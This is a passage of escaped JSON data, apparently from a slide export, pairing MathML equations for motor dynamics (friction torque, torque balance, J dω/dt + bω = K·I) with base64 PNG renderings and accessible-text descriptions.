3e9RhSpdPZhVDk1N4Q1K5RLCDsuWXtvjVQwuSPhaV8UTLpJkAlERfn5IMzWQ3C4Rbo/KLbO169DEub+MWCt0q/wO/nlnmZY0kLgAAAIF0RVh0TWF0aE1MADxtYXRoIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk4L01hdGgvTWF0aE1MIj48bXN0eWxlIG1hdGhzaXplPSIxNnB4Ij48bXN1Yj48bWk+VDwvbWk+PG1pPmY8L21pPjwvbXN1Yj48L21zdHlsZT48L21hdGg+eNggDwAAAABJRU5ErkJggg==\&quot;,\&quot;slideId\&quot;:301,\&quot;accessibleText\&quot;:\&quot;T subscript f\&quot;,\&quot;imageHeight\&quot;:13.297297297297296},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;f&lt;/mi&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#x2009;&lt;/mo&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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\&quot;,\&quot;slideId\&quot;:301,\&quot;accessibleText\&quot;:\&quot;T subscript f space equals thin space b. omega\&quot;,\&quot;imageHeight\&quot;:13.72972972972973},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;s&lt;/mi&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;f&lt;/mi&gt;&lt;/msub&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;msub&gt;&lt;mi&gt;T&lt;/mi&gt;&lt;mi&gt;m&lt;/mi&gt;&lt;/msub&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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\&quot;,\&quot;slideId\&quot;:301,\&quot;accessibleText\&quot;:\&quot;T subscript s space plus space T subscript f space equals space T subscript m\&quot;,\&quot;imageHeight\&quot;:13.297297297297296},{\&quot;mathml\&quot;:\&quot;&lt;math style=\\\&quot;font-family:stix;font-size:16px;\\\&quot; xmlns=\\\&quot;http://www.w3.org/1998/Math/MathML\\\&quot;&gt;&lt;mstyle mathsize=\\\&quot;16px\\\&quot;&gt;&lt;mi&gt;J&lt;/mi&gt;&lt;mfrac&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;/mrow&gt;&lt;mrow&gt;&lt;mi&gt;d&lt;/mi&gt;&lt;mi&gt;t&lt;/mi&gt;&lt;/mrow&gt;&lt;/mfrac&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;+&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;b&lt;/mi&gt;&lt;mi&gt;&amp;#x3C9;&lt;/mi&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mo&gt;=&lt;/mo&gt;&lt;mo&gt;&amp;#xA0;&lt;/mo&gt;&lt;mi&gt;K&lt;/mi&gt;&lt;mo&gt;.&lt;/mo&gt;&lt;mi&gt;I&lt;/mi&gt;&lt;/mstyle&gt;&lt;/math&gt;\&quot;,\&quot;base64Image\&quot;:\&quot;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